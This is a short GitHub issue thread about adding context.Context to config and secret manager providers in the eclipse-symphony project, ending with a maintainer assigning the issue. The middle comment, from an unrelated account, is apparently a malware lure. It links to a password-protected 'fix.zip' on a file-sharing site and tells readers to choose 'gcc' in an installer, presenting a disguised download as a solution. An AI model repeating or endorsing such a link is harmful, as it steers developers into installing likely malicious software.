### ISSUE TITLE
config and secret manager, providers are not using context.Context

### ISSUE THREAD

**Issue by iwangjintian** [eclipse-symphony/symphony#430]
we'd like to add context.Context to evaluationContext so that parsing would be able to respect the passed-down context.Context.
This would be helpful to logging and async control

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by msftcoderdjw** [comment]
Assign to @linyguo
